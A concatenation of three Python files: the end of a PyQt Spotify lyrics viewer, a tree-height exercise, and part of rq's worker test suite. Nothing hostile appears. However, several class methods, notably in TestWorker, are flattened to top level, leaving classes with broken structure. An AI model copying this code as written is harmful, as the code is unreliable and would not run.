                        time.sleep(0.2)
                        start += 0.2 + time_title_end - time_title_start
                    elif song_name != window_title or not count + 1 < len(lrc):
                        # Song switched or last line reached: stop syncing.
                        self.sync_adjustment_slider.setValue(0)
                        break
                    else:
                        if lrc[count + 1].time - self.sync_adjustment_slider.value() <= time.time() - start:
                            count += 1
                            line_changed = True
                        if line_changed:
                            # Un-bold the previous line, bold the current one.
                            lrc[count - 1].text = HTML_TAGS.sub("", lrc[count - 1].text)
                            lrc[count].text =\
                                f"<b style=\"{self.dict_to_style(self.current_line_style)}\">{lrc[count].text}</b>"
                            if count - 2 > 0:
                                # Keep the scroll anchor two lines above the
                                # current one so it stays visible.
                                lrc[count - 3].text = HTML_TAGS.sub("", lrc[count - 3].text)
                                lrc[count - 2].text = "<a name=\"#scrollHere\">%s</a>" % lrc[count - 2].text
                            bold_lyrics = '<style type="text/css">p {font-size: %spt}</style><p>%s</p>' % \
                                          (
                                              self.font_size_box.value(),
                                              '<br>'.join(e.text for e in lrc)
                                          )
                            comm.signal.emit(
                                header,
                                self.add_service_name_to_lyrics(bold_lyrics, lyrics_metadata.service_name)
                            )
                            line_changed = False
                            time.sleep(0.5)
                        else:
                            time.sleep(0.2)
            else:
                # Plain, untimed lyrics: no sync slider, just show the text.
                self.sync_adjustment_slider.setVisible(False)
                comm.signal.emit(
                    header,
                    self.add_service_name_to_lyrics(lyrics_clean, lyrics_metadata.service_name))
        time.sleep(1)
def start_thread(self):
    """Run the lyrics polling loop on a daemon thread so it cannot keep
    the process alive after the GUI exits."""
    worker = threading.Thread(target=self.display_lyrics,
                              args=(self.comm,),
                              daemon=True)
    worker.start()
def refresh_lyrics(self, song_name, lyrics):
    """Slot for the worker thread's signal: show *song_name* and *lyrics*
    in the GUI, scroll to the sync anchor and refresh the info table.
    Does nothing while the player reports no window title."""
    translate = QtCore.QCoreApplication.translate
    if not backend.get_window_title(self.get_current_streaming_service()):
        return
    self.label_song_name.setText(translate("Form", song_name))
    self.set_lyrics_with_alignment(translate("Form", lyrics))
    self.text_browser.scrollToAnchor("#scrollHere")
    self.refresh_info()
def refresh_info(self):
    """Rebuild the song-info table from ``self.song``.

    Title and Artist are always shown; the remaining rows only appear when
    the backend filled in a real value (sentinels: "UNKNOWN" for strings,
    -1 for numbers, empty list for dances).
    """
    self.info_table.clearContents()
    if not self.song:
        return
    self.info_table.setRowCount(8)
    row = 0

    def put(label, value):
        # Helper: write one label/value pair into the next free row.
        nonlocal row
        self.info_table.setItem(row, 0, QtWidgets.QTableWidgetItem(label))
        self.info_table.setItem(row, 1, QtWidgets.QTableWidgetItem(value))
        row += 1

    put("Title", self.song.name)
    put("Artist", self.song.artist)
    if self.song.album != "UNKNOWN":
        put("Album", self.song.album)
    if self.song.genre != "UNKNOWN":
        put("Genre", self.song.genre)
    if self.song.year != -1:
        put("Year", str(self.song.year))
    if self.song.cycles_per_minute != -1:
        put("Cycles Per Minute", str(self.song.cycles_per_minute))
    if self.song.beats_per_minute != -1:
        put("Beats Per Minute", str(self.song.beats_per_minute))
    if self.song.dances:
        put("Dances", "\n".join(self.song.dances))
    self.info_table.resizeRowsToContents()
    self.info_table.resizeColumnsToContents()
def get_chords(self):
    """Open chords for the current song, or print a refusal into the
    lyrics view when no song is known yet."""
    translate = QtCore.QCoreApplication.translate
    if not self.song:
        self.text_browser.append(translate("Form", "I'm sorry, Dave. I'm afraid I can't do that."))
        return
    backend.load_chords(self.song)
def change_lyrics(self):
    """Request alternative lyrics for the current song by raising the
    ``changed`` flag (picked up by the display_lyrics worker loop); print a
    refusal into the lyrics view when no song is known yet."""
    translate = QtCore.QCoreApplication.translate
    if not self.song:
        self.text_browser.append(translate("Form", "I'm sorry, Dave. I'm afraid I can't do that."))
        return
    self.changed = True
def save_lyrics(self):
    """Save the current lyrics to the lyrics directory as .lrc (timed) or
    .txt (plain), asking before overwriting an existing file for the same
    artist/title."""
    if not self.song or not self.lyrics:
        return
    if not os.path.exists(Config.LYRICS_DIR):
        os.makedirs(Config.LYRICS_DIR)
    # Sanitize so artist/title are safe filename components.
    artist = pathvalidate.sanitize_filename(self.song.artist)
    name = pathvalidate.sanitize_filename(self.song.name)
    new_lyrics_file_name = None
    # Look for an existing saved file for this song (substring match on the
    # lowercased file name).
    for lyrics_file_name in os.listdir(Config.LYRICS_DIR):
        lyrics_file_name = os.path.join(Config.LYRICS_DIR, lyrics_file_name)
        if os.path.isfile(lyrics_file_name):
            file_parts = os.path.splitext(lyrics_file_name)
            file_extension = file_parts[1].lower()
            if file_extension in (".txt", ".lrc"):
                file_name = file_parts[0].lower()
                if name.lower() in file_name and artist.lower() in file_name:
                    # Found a match: ask the user whether to overwrite.
                    save_dialog = QMessageBox()
                    save_dialog.setWindowIcon(FORM.windowIcon())
                    save_dialog.setIcon(QMessageBox.Information)
                    save_dialog.setText("You got already saved lyrics for the song %s by %s!" %
                                        (self.song.name, self.song.artist))
                    save_dialog.setInformativeText("Do you want overwrite them?")
                    save_dialog.setWindowTitle("Lyrics already saved")
                    save_dialog.setStandardButtons(QMessageBox.Yes | QMessageBox.No)
                    save_anyway = save_dialog.exec()
                    if save_anyway == QMessageBox.Yes:
                        # Reuse the existing base name (extension re-added below).
                        new_lyrics_file_name = file_parts[0]
                        break
                    else:
                        return
    if not new_lyrics_file_name:
        new_lyrics_file_name = os.path.join(Config.LYRICS_DIR, f"{artist} - {name}")
    text = self.lyrics
    if self.timed:
        lyrics_file_name = new_lyrics_file_name + ".lrc"
        # Bake any manual sync adjustment into the LRC offset before saving.
        if self.sync_adjustment_slider.value() != 0:
            lrc = pylrc.parse(text)
            lrc.offset -= self.sync_adjustment_slider.value() * 1000
            text = lrc.toLRC()
    else:
        lyrics_file_name = new_lyrics_file_name + ".txt"
    with open(lyrics_file_name, "w", encoding="utf-8") as lyrics_file:
        lyrics_file.write(text)
def spotify(self) -> None:
    """Launch the configured streaming client if the option is enabled;
    show a warning dialog when launching fails."""
    if not self.open_spotify:
        return
    if backend.open_spotify(self.get_current_streaming_service()):
        return
    warning_dialog = QMessageBox()
    warning_dialog.setWindowIcon(FORM.windowIcon())
    warning_dialog.setIcon(QMessageBox.Warning)
    warning_dialog.setText("Couldn't open %s!" % str(self.get_current_streaming_service()))
    warning_dialog.setStandardButtons(QMessageBox.Ok)
    warning_dialog.exec()
@classmethod
def dict_to_style(cls, dictionary: dict) -> str:
    """Serialize a mapping of CSS properties into an inline style string.

    Example: ``{"color": "red"}`` -> ``"color: red;"``.  Insertion order of
    the dict is preserved in the output.
    """
    # str.join replaces the original repeated string concatenation,
    # which is quadratic in the number of entries.
    return "".join(f"{key}: {value};" for key, value in dictionary.items())
class FormWidget(QtWidgets.QWidget):
    """Main application window.

    Persists window geometry/settings through the global ``UI`` object on
    move, resize and close; supports minimize-to-tray.
    """

    def __init__(self):
        super().__init__()

    def closeEvent(self, event):
        # Save settings before closing; when minimize-to-tray is enabled,
        # hide instead of closing.
        UI.load_save_settings(save=True)
        if UI.minimize_to_tray:
            event.ignore()
            self.hide()

    def icon_activated(self, reason):
        # Restore the window on a tray-icon double click.
        if reason == QtWidgets.QSystemTrayIcon.DoubleClick:
            self.show()

    def moveEvent(self, a0: QtGui.QMoveEvent) -> None:
        try:
            UI.load_save_settings(save=True)
        except Exception:
            # Best effort only (e.g. UI may not be fully constructed yet).
            # `except Exception` replaces the original bare `except:`, which
            # also swallowed SystemExit/KeyboardInterrupt.
            pass

    def resizeEvent(self, a0: QtGui.QResizeEvent) -> None:
        try:
            UI.load_save_settings(save=True)
        except Exception:
            # Same best-effort rationale as moveEvent.
            pass
if __name__ == "__main__":
    # Crash reporting; auto_enabling_integrations=False keeps Sentry from
    # auto-instrumenting libraries.
    sentry_sdk.init("https://71bf000cb7c5448c8c08660b29a12c09@o407859.ingest.sentry.io/5277612",
                    release=f"spotifylyrics@{backend.get_version()}", auto_enabling_integrations=False)
    with sentry_sdk.configure_scope() as scope:
        try:
            scope.set_user({"username": getpass.getuser()})
        except ModuleNotFoundError:
            # getpass.getuser() imports platform modules internally
            # (e.g. pwd on POSIX); presumably that import can be missing in
            # frozen builds — TODO confirm which platform triggers this.
            pass
        # Tag whether we run from a PyInstaller bundle or from source.
        if getattr(sys, 'frozen', False) and hasattr(sys, '_MEIPASS'):
            running = "pyinstaller"
        else:
            running = "source"
        scope.set_tag("running_from", running)
        scope.set_tag("os", platform.system())
        scope.set_tag("os_version", platform.release())
        scope.set_tag("architecture", platform.machine())
    # Qt bootstrap: FORM and UI are module-level globals used throughout.
    APP = QtWidgets.QApplication(sys.argv)
    APP.setStyle("fusion")
    FORM = FormWidget()
    UI = UiForm()
    FORM.show()
    sys.exit(APP.exec())
|
tree-height.py | # python3
import sys, threading
sys.setrecursionlimit(10**7)  # max depth of recursion (tree can be a long chain)
threading.stack_size(2**27)  # new thread will get a stack of this size (128 MiB) for deep recursion
class TreeHeight:
    """Reads a tree given as a parent array from stdin."""

    def read(self):
        """Parse ``n`` and the parent array from stdin.

        Returns an adjacency dict mapping each vertex (and the virtual
        root key ``-1``) to the list of its children.
        """
        self.n = int(sys.stdin.readline())
        self.parent = list(map(int, sys.stdin.readline().split()))
        children = {vertex: [] for vertex in range(-1, self.n)}
        for child, parent in enumerate(self.parent):
            children[parent].append(child)
        return children
def compute_height(tree, v=-1):
    """Return the height of the subtree rooted at *v* (counted in edges;
    a leaf has height 0).  *tree* is an adjacency dict as produced by
    TreeHeight.read(); the default v=-1 starts at the virtual root.
    """
    if not tree[v]:
        return 0
    # The original tracked the maximum in a local variable named `max`,
    # shadowing the builtin; use max() over a generator instead.
    return 1 + max(compute_height(tree, child) for child in tree[v])
def main():
    """Entry point: read the tree description from stdin and print its height."""
    reader = TreeHeight()
    tree = reader.read()
    print(compute_height(tree))
# Run main() on a fresh thread so it gets the enlarged stack size configured
# above (needed for the deep recursion on degenerate chain-shaped trees).
threading.Thread(target=main).start()
|
test_worker.py | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import os
import psutil
import shutil
import signal
import subprocess
import sys
import time
import zlib
from datetime import datetime, timedelta, timezone
from multiprocessing import Process
from time import sleep
from unittest import skipIf
import redis.exceptions
import pytest
import mock
from mock import Mock
from tests import RQTestCase, slow
from tests.fixtures import (
access_self, create_file, create_file_after_timeout, create_file_after_timeout_and_setsid, div_by_zero, do_nothing,
kill_worker, long_running_job, modify_self, modify_self_and_error,
run_dummy_heroku_worker, save_key_ttl, say_hello, say_pid, raise_exc_mock,
launch_process_within_worker_and_store_pid
)
from rq import Queue, SimpleWorker, Worker, get_current_connection
from rq.compat import as_text, PY2
from rq.job import Job, JobStatus, Retry
from rq.registry import StartedJobRegistry, FailedJobRegistry, FinishedJobRegistry
from rq.suspension import resume, suspend
from rq.utils import utcnow
from rq.version import VERSION
from rq.worker import HerokuWorker, WorkerStatus, RoundRobinWorker, RandomWorker
from rq.serializers import JSONSerializer
class CustomJob(Job):
    # Marker subclass: used to verify Worker honours a custom job_class.
    pass
class CustomQueue(Queue):
    # Marker subclass: used to verify Worker honours a custom queue_class.
    pass
class TestWorker(RQTestCase):
def test_create_worker(self):
    """Worker creation using various inputs.

    Accepted queue specs: a single name, a list/iterable of names, byte
    strings (Python 2 only), Queue instances, and an optional serializer.
    """
    # With single string argument
    w = Worker('foo')
    self.assertEqual(w.queues[0].name, 'foo')
    # With list of strings
    w = Worker(['foo', 'bar'])
    self.assertEqual(w.queues[0].name, 'foo')
    self.assertEqual(w.queues[1].name, 'bar')
    self.assertEqual(w.queue_keys(), [w.queues[0].key, w.queues[1].key])
    self.assertEqual(w.queue_names(), ['foo', 'bar'])
    # With iterable of strings
    w = Worker(iter(['foo', 'bar']))
    self.assertEqual(w.queues[0].name, 'foo')
    self.assertEqual(w.queues[1].name, 'bar')
    # Also accept byte strings in Python 2
    if PY2:
        # With single byte string argument
        w = Worker(b'foo')
        self.assertEqual(w.queues[0].name, 'foo')
        # With list of byte strings
        w = Worker([b'foo', b'bar'])
        self.assertEqual(w.queues[0].name, 'foo')
        self.assertEqual(w.queues[1].name, 'bar')
        # With iterable of byte strings
        w = Worker(iter([b'foo', b'bar']))
        self.assertEqual(w.queues[0].name, 'foo')
        self.assertEqual(w.queues[1].name, 'bar')
    # With single Queue
    w = Worker(Queue('foo'))
    self.assertEqual(w.queues[0].name, 'foo')
    # With iterable of Queues
    w = Worker(iter([Queue('foo'), Queue('bar')]))
    self.assertEqual(w.queues[0].name, 'foo')
    self.assertEqual(w.queues[1].name, 'bar')
    # With list of Queues
    w = Worker([Queue('foo'), Queue('bar')])
    self.assertEqual(w.queues[0].name, 'foo')
    self.assertEqual(w.queues[1].name, 'bar')
    # With string and serializer
    w = Worker('foo', serializer=json)
    self.assertEqual(w.queues[0].name, 'foo')
    # With queue having serializer
    w = Worker(Queue('foo'), serializer=json)
    self.assertEqual(w.queues[0].name, 'foo')
def test_work_and_quit(self):
    """Worker processes work, then quits."""
    foo_queue, bar_queue = Queue('foo'), Queue('bar')
    worker = Worker([foo_queue, bar_queue])
    # Burst mode on empty queues should report that nothing was done.
    self.assertEqual(
        worker.work(burst=True), False,
        'Did not expect any work on the queue.'
    )
    foo_queue.enqueue(say_hello, name='Frank')
    # With a job enqueued, burst mode should report work was performed.
    self.assertEqual(
        worker.work(burst=True), True,
        'Expected at least some work done.'
    )
def test_work_and_quit_custom_serializer(self):
    """Worker processes work, then quits.

    Same flow as test_work_and_quit, but queues and worker share a custom
    (JSON) serializer.
    """
    fooq, barq = Queue('foo', serializer=JSONSerializer), Queue('bar', serializer=JSONSerializer)
    w = Worker([fooq, barq], serializer=JSONSerializer)
    self.assertEqual(
        w.work(burst=True), False,
        'Did not expect any work on the queue.'
    )
    fooq.enqueue(say_hello, name='Frank')
    self.assertEqual(
        w.work(burst=True), True,
        'Expected at least some work done.'
    )
def test_worker_all(self):
    """Worker.all() works properly"""
    foo_queue = Queue('foo')
    bar_queue = Queue('bar')
    # register_birth() is what makes a worker discoverable via Worker.all().
    w1 = Worker([foo_queue, bar_queue], name='w1')
    w1.register_birth()
    w2 = Worker([foo_queue], name='w2')
    w2.register_birth()
    self.assertEqual(
        set(Worker.all(connection=foo_queue.connection)),
        set([w1, w2])
    )
    # Filtering by queue returns only workers listening on that queue.
    self.assertEqual(set(Worker.all(queue=foo_queue)), set([w1, w2]))
    self.assertEqual(set(Worker.all(queue=bar_queue)), set([w1]))
    w1.register_death()
    w2.register_death()
def test_find_by_key(self):
    """Worker.find_by_key restores queues, state and job_id."""
    queues = [Queue('foo'), Queue('bar')]
    w = Worker(queues)
    w.register_death()
    w.register_birth()
    w.set_state(WorkerStatus.STARTED)
    worker = Worker.find_by_key(w.key)
    self.assertEqual(worker.queues, queues)
    self.assertEqual(worker.get_state(), WorkerStatus.STARTED)
    self.assertEqual(worker._job_id, None)
    self.assertTrue(worker.key in Worker.all_keys(worker.connection))
    self.assertEqual(worker.version, VERSION)
    # If worker is gone, its keys should also be removed
    worker.connection.delete(worker.key)
    Worker.find_by_key(worker.key)
    self.assertFalse(worker.key in Worker.all_keys(worker.connection))
    # Looking up a key that is not a worker key raises ValueError.
    self.assertRaises(ValueError, Worker.find_by_key, 'foo')
def test_worker_ttl(self):
    """Worker ttl."""
    # A registered worker's Redis key must carry an expiry (TTL).
    worker = Worker([])
    worker.register_birth()
    [worker_key] = self.testconn.smembers(Worker.redis_workers_keys)
    self.assertIsNotNone(self.testconn.ttl(worker_key))
    worker.register_death()
def test_work_via_string_argument(self):
    """Worker processes work fed via string arguments."""
    q = Queue('foo')
    w = Worker([q])
    # The job function is referenced by its dotted path, not a callable.
    job = q.enqueue('tests.fixtures.say_hello', name='Frank')
    self.assertEqual(
        w.work(burst=True), True,
        'Expected at least some work done.'
    )
    self.assertEqual(job.result, 'Hi there, Frank!')
    # worker_name is cleared once the job has finished.
    self.assertIsNone(job.worker_name)
def test_job_times(self):
    """job times are set correctly."""
    q = Queue('foo')
    w = Worker([q])
    before = utcnow()
    # Drop microseconds so the lower bound is not ahead of enqueued_at.
    before = before.replace(microsecond=0)
    job = q.enqueue(say_hello)
    self.assertIsNotNone(job.enqueued_at)
    self.assertIsNone(job.started_at)
    self.assertIsNone(job.ended_at)
    self.assertEqual(
        w.work(burst=True), True,
        'Expected at least some work done.'
    )
    self.assertEqual(job.result, 'Hi there, Stranger!')
    after = utcnow()
    job.refresh()
    # All three timestamps must fall inside the [before, after] window.
    self.assertTrue(
        before <= job.enqueued_at <= after,
        'Not %s <= %s <= %s' % (before, job.enqueued_at, after)
    )
    self.assertTrue(
        before <= job.started_at <= after,
        'Not %s <= %s <= %s' % (before, job.started_at, after)
    )
    self.assertTrue(
        before <= job.ended_at <= after,
        'Not %s <= %s <= %s' % (before, job.ended_at, after)
    )
def test_work_is_unreadable(self):
    """Unreadable jobs are put on the failed job registry."""
    q = Queue()
    self.assertEqual(q.count, 0)
    # NOTE: We have to fake this enqueueing for this test case.
    # What we're simulating here is a call to a function that is not
    # importable from the worker process.
    job = Job.create(func=div_by_zero, args=(3,), origin=q.name)
    job.save()
    # Corrupt the serialized payload so the function path cannot resolve.
    job_data = job.data
    invalid_data = job_data.replace(b'div_by_zero', b'nonexisting')
    assert job_data != invalid_data
    self.testconn.hset(job.key, 'data', zlib.compress(invalid_data))
    # We use the low-level internal function to enqueue any data (bypassing
    # validity checks)
    q.push_job_id(job.id)
    self.assertEqual(q.count, 1)
    # All set, we're going to process it
    w = Worker([q])
    w.work(burst=True)  # should silently pass
    self.assertEqual(q.count, 0)
    failed_job_registry = FailedJobRegistry(queue=q)
    self.assertTrue(job in failed_job_registry)
def test_heartbeat(self):
    """Heartbeat saves last_heartbeat"""
    q = Queue()
    w = Worker([q])
    w.register_birth()
    # Birth registration stores pid/hostname/birth/last_heartbeat in the
    # worker's Redis hash.
    self.assertEqual(str(w.pid), as_text(self.testconn.hget(w.key, 'pid')))
    self.assertEqual(w.hostname,
                     as_text(self.testconn.hget(w.key, 'hostname')))
    last_heartbeat = self.testconn.hget(w.key, 'last_heartbeat')
    self.assertIsNotNone(self.testconn.hget(w.key, 'birth'))
    self.assertTrue(last_heartbeat is not None)
    w = Worker.find_by_key(w.key)
    self.assertIsInstance(w.last_heartbeat, datetime)
    # worker.refresh() shouldn't fail if last_heartbeat is None
    # for compatibility reasons
    self.testconn.hdel(w.key, 'last_heartbeat')
    w.refresh()
    # worker.refresh() shouldn't fail if birth is None
    # for compatibility reasons
    self.testconn.hdel(w.key, 'birth')
    w.refresh()
@slow
def test_heartbeat_survives_lost_connection(self):
    """A transient Redis ConnectionError during heartbeat must not kill
    the work loop."""
    with mock.patch.object(Worker, 'heartbeat') as mocked:
        # None -> Heartbeat is first called before the job loop
        mocked.side_effect = [None, redis.exceptions.ConnectionError()]
        q = Queue()
        w = Worker([q])
        w.work(burst=True)
        # First call is prior to job loop, second raises the error,
        # third is successful, after "recovery"
        assert mocked.call_count == 3
@slow
def test_heartbeat_busy(self):
    """Periodic heartbeats while horse is busy with long jobs"""
    q = Queue()
    # Heartbeat every 5s -> a job of N seconds yields floor(N/5) beats.
    w = Worker([q], job_monitoring_interval=5)
    for timeout, expected_heartbeats in [(2, 0), (7, 1), (12, 2)]:
        job = q.enqueue(long_running_job,
                        args=(timeout,),
                        job_timeout=30,
                        result_ttl=-1)
        with mock.patch.object(w, 'heartbeat', wraps=w.heartbeat) as mocked:
            w.execute_job(job, q)
            self.assertEqual(mocked.call_count, expected_heartbeats)
        job = Job.fetch(job.id)
        self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_work_fails(self):
    """Failing jobs are put on the failed queue."""
    q = Queue()
    self.assertEqual(q.count, 0)
    # Action
    job = q.enqueue(div_by_zero)
    self.assertEqual(q.count, 1)
    # keep for later
    enqueued_at_date = str(job.enqueued_at)
    w = Worker([q])
    w.work(burst=True)
    # Postconditions
    self.assertEqual(q.count, 0)
    failed_job_registry = FailedJobRegistry(queue=q)
    self.assertTrue(job in failed_job_registry)
    self.assertEqual(w.get_current_job_id(), None)
    # Check the job
    job = Job.fetch(job.id)
    self.assertEqual(job.origin, q.name)
    self.assertIsNone(job.worker_name)  # Worker name is cleared after failures
    # Should be the original enqueued_at date, not the date of enqueueing
    # to the failed queue
    self.assertEqual(str(job.enqueued_at), enqueued_at_date)
    self.assertTrue(job.exc_info)  # should contain exc_info
def test_horse_fails(self):
    """Tests that job status is set to FAILED even if horse unexpectedly fails"""
    q = Queue()
    self.assertEqual(q.count, 0)
    # Action
    job = q.enqueue(say_hello)
    self.assertEqual(q.count, 1)
    # keep for later
    enqueued_at_date = str(job.enqueued_at)
    w = Worker([q])
    # Make perform_job itself blow up to simulate an unexpected horse crash.
    with mock.patch.object(w, 'perform_job', new_callable=raise_exc_mock):
        w.work(burst=True)  # should silently pass
    # Postconditions
    self.assertEqual(q.count, 0)
    failed_job_registry = FailedJobRegistry(queue=q)
    self.assertTrue(job in failed_job_registry)
    self.assertEqual(w.get_current_job_id(), None)
    # Check the job
    job = Job.fetch(job.id)
    self.assertEqual(job.origin, q.name)
    # Should be the original enqueued_at date, not the date of enqueueing
    # to the failed queue
    self.assertEqual(str(job.enqueued_at), enqueued_at_date)
    self.assertTrue(job.exc_info)  # should contain exc_info
def test_statistics(self):
    """Successful and failed job counts are saved properly"""
    queue = Queue()
    job = queue.enqueue(div_by_zero)
    worker = Worker([queue])
    worker.register_birth()
    self.assertEqual(worker.failed_job_count, 0)
    self.assertEqual(worker.successful_job_count, 0)
    self.assertEqual(worker.total_working_time, 0)
    registry = StartedJobRegistry(connection=worker.connection)
    # Give the job a fixed 0.75s duration so working time is predictable.
    job.started_at = utcnow()
    job.ended_at = job.started_at + timedelta(seconds=0.75)
    worker.handle_job_failure(job, queue)
    worker.handle_job_success(job, queue, registry)
    worker.refresh()
    self.assertEqual(worker.failed_job_count, 1)
    self.assertEqual(worker.successful_job_count, 1)
    self.assertEqual(worker.total_working_time, 1.5)  # 1.5 seconds
    worker.handle_job_failure(job, queue)
    worker.handle_job_success(job, queue, registry)
    worker.refresh()
    self.assertEqual(worker.failed_job_count, 2)
    self.assertEqual(worker.successful_job_count, 2)
    self.assertEqual(worker.total_working_time, 3.0)
def test_handle_retry(self):
    """handle_job_failure() handles retry properly"""
    connection = self.testconn
    queue = Queue(connection=connection)
    retry = Retry(max=2)
    job = queue.enqueue(div_by_zero, retry=retry)
    registry = FailedJobRegistry(queue=queue)
    worker = Worker([queue])
    # If job is configured to retry, it will be put back in the queue
    # and not put in the FailedJobRegistry.
    # This is the original execution
    queue.empty()
    worker.handle_job_failure(job, queue)
    job.refresh()
    self.assertEqual(job.retries_left, 1)
    self.assertEqual([job.id], queue.job_ids)
    self.assertFalse(job in registry)
    # First retry
    queue.empty()
    worker.handle_job_failure(job, queue)
    job.refresh()
    self.assertEqual(job.retries_left, 0)
    self.assertEqual([job.id], queue.job_ids)
    # Second retry
    queue.empty()
    worker.handle_job_failure(job, queue)
    job.refresh()
    self.assertEqual(job.retries_left, 0)
    self.assertEqual([], queue.job_ids)
    # If a job is no longer retried, it's put in FailedJobRegistry
    self.assertTrue(job in registry)
def test_retry_interval(self):
    """Retries with intervals are scheduled"""
    connection = self.testconn
    queue = Queue(connection=connection)
    retry = Retry(max=1, interval=5)
    job = queue.enqueue(div_by_zero, retry=retry)
    worker = Worker([queue])
    registry = queue.scheduled_job_registry
    # If job is configured to retry with interval, it will be scheduled,
    # not directly put back in the queue
    queue.empty()
    worker.handle_job_failure(job, queue)
    job.refresh()
    self.assertEqual(job.get_status(), JobStatus.SCHEDULED)
    self.assertEqual(job.retries_left, 0)
    self.assertEqual(len(registry), 1)
    self.assertEqual(queue.job_ids, [])
    # Scheduled time is roughly 5 seconds from now (±1s slack for test runtime)
    scheduled_time = registry.get_scheduled_time(job)
    now = datetime.now(timezone.utc)
    self.assertTrue(now + timedelta(seconds=4) < scheduled_time < now + timedelta(seconds=6))
def test_total_working_time(self):
    """worker.total_working_time is stored properly"""
    queue = Queue()
    job = queue.enqueue(long_running_job, 0.05)
    worker = Worker([queue])
    worker.register_birth()
    worker.perform_job(job, queue)
    worker.refresh()
    # total_working_time should be a little bit more than 0.05 seconds
    self.assertGreaterEqual(worker.total_working_time, 0.05)
    # in multi-user environments delays might be unpredictable,
    # please adjust this magic limit accordingly in case if It takes even longer to run
    self.assertLess(worker.total_working_time, 1)
def test_max_jobs(self):
    """Worker exits after number of jobs complete."""
    queue = Queue()
    first_job = queue.enqueue(do_nothing)
    second_job = queue.enqueue(do_nothing)
    worker = Worker([queue])
    worker.work(max_jobs=1)
    # With max_jobs=1, only the first enqueued job may have run.
    self.assertEqual(JobStatus.FINISHED, first_job.get_status())
    self.assertEqual(JobStatus.QUEUED, second_job.get_status())
def test_disable_default_exception_handler(self):
    """
    Job is not moved to FailedJobRegistry when default custom exception
    handler is disabled.
    """
    queue = Queue(name='default', connection=self.testconn)
    job = queue.enqueue(div_by_zero)
    # Default handler enabled: failure lands in FailedJobRegistry.
    worker = Worker([queue], disable_default_exception_handler=False)
    worker.work(burst=True)
    registry = FailedJobRegistry(queue=queue)
    self.assertTrue(job in registry)
    # Job is not added to FailedJobRegistry if
    # disable_default_exception_handler is True
    job = queue.enqueue(div_by_zero)
    worker = Worker([queue], disable_default_exception_handler=True)
    worker.work(burst=True)
    self.assertFalse(job in registry)
def test_custom_exc_handling(self):
    """Custom exception handling.

    Handlers run in order; returning False stops the chain, True (or None)
    lets the next handler run.
    """
    def first_handler(job, *exc_info):
        job.meta = {'first_handler': True}
        job.save_meta()
        return True

    def second_handler(job, *exc_info):
        job.meta.update({'second_handler': True})
        job.save_meta()

    def black_hole(job, *exc_info):
        # Don't fall through to default behaviour (moving to failed queue)
        return False

    q = Queue()
    self.assertEqual(q.count, 0)
    job = q.enqueue(div_by_zero)
    w = Worker([q], exception_handlers=first_handler)
    w.work(burst=True)
    # Check the job
    job.refresh()
    self.assertEqual(job.is_failed, True)
    self.assertTrue(job.meta['first_handler'])
    job = q.enqueue(div_by_zero)
    w = Worker([q], exception_handlers=[first_handler, second_handler])
    w.work(burst=True)
    # Both custom exception handlers are run
    job.refresh()
    self.assertEqual(job.is_failed, True)
    self.assertTrue(job.meta['first_handler'])
    self.assertTrue(job.meta['second_handler'])
    job = q.enqueue(div_by_zero)
    w = Worker([q], exception_handlers=[first_handler, black_hole,
                                        second_handler])
    w.work(burst=True)
    # second_handler is not run since it's interrupted by black_hole
    job.refresh()
    self.assertEqual(job.is_failed, True)
    self.assertTrue(job.meta['first_handler'])
    self.assertEqual(job.meta.get('second_handler'), None)
def test_cancelled_jobs_arent_executed(self):
    """Cancelling jobs."""
    SENTINEL_FILE = '/tmp/rq-tests.txt'  # noqa
    try:
        # Remove the sentinel if it is leftover from a previous test run
        os.remove(SENTINEL_FILE)
    except OSError as e:
        # errno 2 == ENOENT (file did not exist), which is fine here.
        if e.errno != 2:
            raise
    q = Queue()
    job = q.enqueue(create_file, SENTINEL_FILE)
    # Here, we cancel the job, so the sentinel file may not be created
    self.testconn.delete(job.key)
    w = Worker([q])
    w.work(burst=True)
    assert q.count == 0
    # Should not have created evidence of execution
    self.assertEqual(os.path.exists(SENTINEL_FILE), False)
@slow  # noqa
def test_timeouts(self):
    """Worker kills jobs after timeout."""
    sentinel_file = '/tmp/.rq_sentinel'
    q = Queue()
    w = Worker([q])
    # Put it on the queue with a timeout value
    res = q.enqueue(create_file_after_timeout,
                    args=(sentinel_file, 4),
                    job_timeout=1)
    try:
        os.unlink(sentinel_file)
    except OSError as e:
        # Only a missing file (errno 2, ENOENT) is acceptable; re-raise
        # anything else.  The original errno check had an empty body and
        # therefore silently swallowed every OSError.
        if e.errno != 2:
            raise
    self.assertEqual(os.path.exists(sentinel_file), False)
    w.work(burst=True)
    # The 4s job must have been killed by the 1s timeout before writing.
    self.assertEqual(os.path.exists(sentinel_file), False)
    # TODO: Having to do the manual refresh() here is really ugly!
    res.refresh()
    self.assertIn('JobTimeoutException', as_text(res.exc_info))
def test_worker_sets_result_ttl(self):
    """Ensure that Worker properly sets result_ttl for individual jobs."""
    q = Queue()
    job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
    w = Worker([q])
    self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
    w.work(burst=True)
    # Positive result_ttl: job key expires eventually (ttl != 0).
    self.assertNotEqual(self.testconn.ttl(job.key), 0)
    self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
    # Job with -1 result_ttl don't expire
    job = q.enqueue(say_hello, args=('Frank',), result_ttl=-1)
    w = Worker([q])
    self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
    w.work(burst=True)
    self.assertEqual(self.testconn.ttl(job.key), -1)
    self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
    # Job with result_ttl = 0 gets deleted immediately
    job = q.enqueue(say_hello, args=('Frank',), result_ttl=0)
    w = Worker([q])
    self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
    w.work(burst=True)
    self.assertEqual(self.testconn.get(job.key), None)
    self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
def test_worker_sets_job_status(self):
    """Ensure that worker correctly sets job status."""
    q = Queue()
    w = Worker([q])
    job = q.enqueue(say_hello)
    # Freshly enqueued: queued, not finished, not failed.
    self.assertEqual(job.get_status(), JobStatus.QUEUED)
    self.assertEqual(job.is_queued, True)
    self.assertEqual(job.is_finished, False)
    self.assertEqual(job.is_failed, False)
    w.work(burst=True)
    # Re-fetch to observe the status the worker persisted to redis.
    job = Job.fetch(job.id)
    self.assertEqual(job.get_status(), JobStatus.FINISHED)
